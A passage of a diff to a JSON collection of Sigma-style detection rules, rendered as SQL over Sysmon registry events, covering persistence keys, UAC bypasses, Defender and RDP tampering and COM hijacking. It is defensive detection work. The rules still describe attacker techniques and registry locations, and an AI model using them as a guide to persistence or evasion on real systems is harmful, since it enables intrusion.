LIKE '%\\\\Directory\\\\Shellex\\\\CopyHookHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Classes\\\\AllFileSystemObjects\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\.exe%' ESCAPE '\\' OR TargetObject LIKE '%\\\\.cmd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\PropertySheetHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\ContextMenuHandlers%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR (Details = '{807583E5-5146-11D5-A672-00B0D022E945}') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\drvinst.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\lnkfile\\\\shellex\\\\ContextMenuHandlers\\\\%' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_outlook_homepage.yml" + "filename": "registry_set_asep_reg_keys_modification_classes.yml" }, { - "title": "Modify User Shell Folders Startup Value", - "id": "9c226817-8dc9-46c2-a58d-66655aafd7dc", + "title": "Disable PUA Protection on Windows Defender", + "id": "8ffc5407-52e3-478f-9596-0a7371eafe13", "status": "experimental", - "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", - "author": "frack113", + "description": "Detects disabling Windows Defender PUA protection", + "author": "Austin Songer @austinsonger", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' AND TargetObject LIKE '%Startup' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\PUAProtection%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "registry_set_susp_user_shell_folders.yml" + "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml" }, { - "title": "RDP Sensitive Settings Changed", - "id": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", + "title": "Potential Registry Persistence Attempt Via Windows Telemetry", + "id": "73a883d0-0348-4be4-a8d8-51031c2564f8", "status": "test", - "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", - "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "description": "Detects potential persistence behaviour using the windows telemetry registry key.\nWindows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", + "author": "Lednyov Alexey, oscd.community, Sreeman", "tags": [ - "attack.defense_evasion", "attack.persistence", - "attack.t1112" + "attack.t1053.005" ], "falsepositives": [ - "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Shadow' ESCAPE '\\' AND Details IN ('DWORD (0x00000001)', 'DWORD (0x00000002)', 'DWORD (0x00000003)', 'DWORD (0x00000004)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\fAllowUnsolicited' ESCAPE '\\' OR TargetObject LIKE '%\\\\fAllowUnsolicitedFullControl' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\services\\\\TermService\\\\Parameters\\\\ServiceDll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\InitialProgram%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\TelemetryController\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Command' ESCAPE '\\' AND (Details LIKE '%.sh%' ESCAPE '\\' OR Details LIKE '%.exe%' ESCAPE '\\' OR Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.bin%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.cmd%' ESCAPE '\\' OR Details LIKE '%.js%' ESCAPE '\\' OR Details LIKE '%.ps%' ESCAPE '\\' OR Details LIKE '%.vb%' ESCAPE '\\' OR Details LIKE '%.jar%' ESCAPE '\\' OR Details LIKE '%.hta%' ESCAPE '\\' OR Details LIKE '%.msi%' ESCAPE '\\' OR Details LIKE '%.vbs%' ESCAPE '\\')) AND NOT ((Details LIKE '%\\\\system32\\\\CompatTelRunner.exe%' ESCAPE '\\' OR Details LIKE '%\\\\system32\\\\DeviceCensus.exe%' ESCAPE '\\')))" ], - "filename": "registry_set_terminal_server_tampering.yml" + "filename": "registry_set_telemetry_persistence.yml" }, { - "title": "Potential Persistence Via COM Search Order Hijacking", - "id": "a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12", - "status": "experimental", - "description": "Detects potential COM object hijacking leveraging the COM Search Order", - "author": "Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien", + "title": "Bypass UAC Using SilentCleanup Task", + "id": "724ea201-6514-4f38-9739-e5973c34f49a", + "status": "test", + "description": "There is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1546.015" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ - "Some installed utilities (i.e. OneDrive) may serve new COM objects at user-level" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\') AND NOT (((Details LIKE '%\\%\\%systemroot\\%\\%\\\\system32\\\\%' ESCAPE '\\' OR Details LIKE '%\\%\\%systemroot\\%\\%\\\\SysWow64\\\\%' ESCAPE '\\')) OR ((Details LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\FileCoAuthLib64.dll%' ESCAPE '\\' OR Details LIKE '%\\\\FileSyncShell64.dll%' ESCAPE '\\' OR Details LIKE '%\\\\FileSyncApi64.dll%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\SecurityHealthService.exe' ESCAPE '\\') OR (Details LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\TeamsMeetingAddin\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\Microsoft.Teams.AddinLoader.dll%' ESCAPE '\\') OR (Details LIKE '%\\\\AppData\\\\Roaming\\\\Dropbox\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\DropboxExt64.%.dll%' ESCAPE '\\') OR (Details LIKE '%TmopIEPlg.dll' ESCAPE '\\') OR ((Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wuauclt.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (Details LIKE '%\\\\FileRepository\\\\nvmdi.inf%' ESCAPE '\\') OR (Image LIKE '%\\\\MicrosoftEdgeUpdateComRegisterShell64.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\SYSTEM32\\\\dxdiag.exe' ESCAPE '\\') OR ((Details LIKE 'C:\\\\Windows\\\\pyshellext.amd64.dll' ESCAPE '\\' OR Details LIKE 'C:\\\\Windows\\\\pyshellext.dll' ESCAPE '\\')) OR ((Details LIKE 'C:\\\\Windows\\\\system32\\\\dnssdX.dll' ESCAPE '\\' OR Details LIKE 'C:\\\\Windows\\\\SysWOW64\\\\dnssdX.dll' ESCAPE '\\')) OR (Details LIKE 'C:\\\\Windows\\\\system32\\\\spool\\\\drivers\\\\x64\\\\3\\\\PrintConfig.dll' ESCAPE '\\') OR ((Details LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (Details LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\%' ESCAPE '\\') OR (Details LIKE '%C:\\\\WINDOWS\\\\system32\\\\GamingServicesProxy.dll%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND Details LIKE '%C:\\\\Windows\\\\System32\\\\Autopilot.dll%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\SecurityHealthService.exe' ESCAPE '\\' AND Details LIKE '%C:\\\\Windows\\\\System32\\\\SecurityHealth%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\regsvr32.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\InProcServer32\\\\(Default)' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Environment\\\\windir' ESCAPE '\\' AND Details LIKE '%&REM%' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "registry_set_persistence_search_order.yml" + "filename": "registry_set_bypass_uac_using_silentcleanup_task.yml" }, { - "title": "Potential Persistence Via Custom Protocol Handler", - "id": "fdbf0b9d-0182-4c43-893b-a1eaab92d085", + "title": "Add Debugger Entry To AeDebug For Persistence", + "id": "092af964-4233-4373-b4ba-d86ea2890288", "status": "experimental", - "description": "Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism.", + "description": "Detects when an attacker adds a new \"Debugger\" value to the \"AeDebug\" key in order to achieve persistence which will get invoked when an application crashes", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.persistence" ], "falsepositives": [ - "Legitimate applications registering a new custom protocol handler" + "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKCR\\\\%' ESCAPE '\\' AND Details LIKE 'URL:%' ESCAPE '\\') AND NOT ((Details LIKE 'URL:ms-%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AeDebug\\\\Debugger%' ESCAPE '\\' AND Details LIKE '%.dll' ESCAPE '\\') AND NOT (Details LIKE '\"C:\\\\WINDOWS\\\\system32\\\\vsjitdebugger.exe\" -p \\%ld -e \\%ld -j 0x\\%p' ESCAPE '\\'))" ], - "filename": "registry_set_persistence_custom_protocol_handler.yml" + "filename": "registry_set_aedebug_persistence.yml" }, { - "title": "Potential PowerShell Execution Policy Tampering", - "id": "fad91067-08c5-4d1a-8d8c-d96a21b37814", + "title": "Bypass UAC Using Event Viewer", + "id": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", "status": "experimental", - "description": "Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.t1547.010" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy' ESCAPE '\\') AND (Details LIKE '%Bypass%' ESCAPE '\\' OR Details LIKE '%RemoteSigned%' ESCAPE '\\' OR Details LIKE '%Unrestricted%' ESCAPE '\\')) AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\_Classes\\\\mscfile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\') AND NOT (Details LIKE '\\%SystemRoot\\%\\\\system32\\\\mmc.exe \"\\%1\" \\%%' ESCAPE '\\'))" ], - "filename": "registry_set_powershell_execution_policy.yml" + "filename": "registry_set_bypass_uac_using_eventviewer.yml" }, { - "title": "Potential Persistence Via LSA Extensions", - "id": "41f6531d-af6e-4c6e-918f-b946f2b85a36", - "status": "experimental", - "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "System Scripts Autorun Keys Modification", + "id": "e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1", + "status": "test", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.persistence" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unlikely" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\LsaExtensionConfig\\\\LsaSrv\\\\Extensions%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Startup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Shutdown%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Logon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Logoff%' ESCAPE '\\')) AND NOT (Details = '(Empty)'))" ], - "filename": "registry_set_persistence_lsa_extension.yml" + "filename": "registry_set_asep_reg_keys_modification_system_scripts.yml" }, { - "title": "Scheduled TaskCache Change by Uncommon Program", - "id": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", + "title": "VBScript Payload Stored in Registry", + "id": "46490193-1b22-4c29-bdd6-5bf63907216f", "status": "experimental", - "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", - "author": "Syed Hasan (@syedhasan009)", + "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1053", - "attack.t1053.005" + "attack.t1547.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%Microsoft\\\\Windows\\\\UpdateOrchestrator%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\SoftwareProtectionPlatform\\\\SvcRestartTask\\\\Index%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\Flighting\\\\OneSettings\\\\RefreshCache\\\\Index%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND Image LIKE '%\\\\ngen.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\.NET Framework\\\\.NET Framework NGEN%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\PLA\\\\Server Manager Performance Monitor\\\\%' ESCAPE '\\') OR (Image = 'System')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (Details LIKE '%vbscript:%' ESCAPE '\\' OR Details LIKE '%jscript:%' ESCAPE '\\' OR Details LIKE '%mshtml,%' ESCAPE '\\' OR Details LIKE '%RunHTMLApplication%' ESCAPE '\\' OR Details LIKE '%Execute(%' ESCAPE '\\' OR Details LIKE '%CreateObject%' ESCAPE '\\' OR Details LIKE '%window.close%' ESCAPE '\\')) AND NOT ((TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\') OR (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Installer\\\\UserData\\\\%' ESCAPE '\\' AND (Details LIKE '%\\\\Microsoft.NET\\\\Primary Interop Assemblies\\\\Microsoft.mshtml.dll%' ESCAPE '\\' OR Details LIKE '%<\\\\Microsoft.mshtml,fileVersion=%' ESCAPE '\\' OR Details LIKE '%\\_mshtml\\_dll\\_%' ESCAPE '\\' OR Details LIKE '%<\\\\Microsoft.mshtml,culture=%' ESCAPE '\\'))))" ], - "filename": "registry_set_taskcache_entry.yml" + "filename": "registry_set_vbs_payload_stored.yml" }, { - "title": "Suspicious New Printer Ports in Registry (CVE-2020-1048)", - "id": "7ec912f2-5175-4868-b811-ec13ad0f8567", + "title": "WinSock2 Autorun Keys Modification", + "id": "d6c2ce7e-afb5-4337-9ca4-4b5254ed0565", "status": "test", - "description": "Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048", - "author": "EagleEye Team, Florian Roth (Nextron Systems), NVISO", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ "attack.persistence", - "attack.execution", - "attack.defense_evasion", - "attack.t1112" + "attack.t1547.001" ], "falsepositives": [ - "New printer port install on host" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Ports%' ESCAPE '\\' AND (Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.exe%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.com%' ESCAPE '\\' OR Details LIKE '%C:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\WinSock2\\\\Parameters%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Protocol\\_Catalog9\\\\Catalog\\_Entries%' ESCAPE '\\' OR TargetObject LIKE '%\\\\NameSpace\\_Catalog5\\\\Catalog\\_Entries%' ESCAPE '\\')) AND NOT (Details = '(Empty)' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\MsiExec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\'))" ], - "filename": "registry_set_cve_2020_1048_new_printer_port.yml" + "filename": "registry_set_asep_reg_keys_modification_winsock2.yml" }, { - "title": "Persistence Via Hhctrl.ocx", - "id": "f10ed525-97fe-4fed-be7c-2feecca941b1", + "title": "Disabled RestrictedAdminMode For RDS", + "id": "d6ce7ebd-260b-4323-9768-a9631c8d4db2", "status": "experimental", - "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\\\InprocServer32\\\\(Default)%' ESCAPE '\\') AND NOT (Details LIKE 'C:\\\\Windows\\\\System32\\\\hhctrl.ocx' ESCAPE '\\'))" - ], - "filename": "registry_set_hhctrl_persistence.yml" - }, - { - "title": "Suspicious Keyboard Layout Load", - "id": "34aa0252-6039-40ff-951f-939fd6ce47d8", - "status": "test", - "description": "Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.resource_development", - "attack.t1588.002" - ], - "falsepositives": [ - "Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Keyboard Layout\\\\Preload\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Keyboard Layout\\\\Substitutes\\\\%' ESCAPE '\\') AND (Details LIKE '%00000429%' ESCAPE '\\' OR Details LIKE '%00050429%' ESCAPE '\\' OR Details LIKE '%0000042a%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\DisableRestrictedAdmin' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "registry_set_susp_keyboard_layout_load.yml" + "filename": "registry_set_lsa_disablerestrictedadmin.yml" }, { - "title": "Classes Autorun Keys Modification", - "id": "9df5f547-c86a-433e-b533-f2794357e242", + "title": "Change User Account Associated with the FAX Service", + "id": "e3fdf743-f05b-4051-990a-b66919be1743", "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Classes%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ExtShellFolderViews%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\Shellex\\\\ColumnHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Filter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Exefile\\\\Shell\\\\Open\\\\Command\\\\(Default)%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\CopyHookHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE 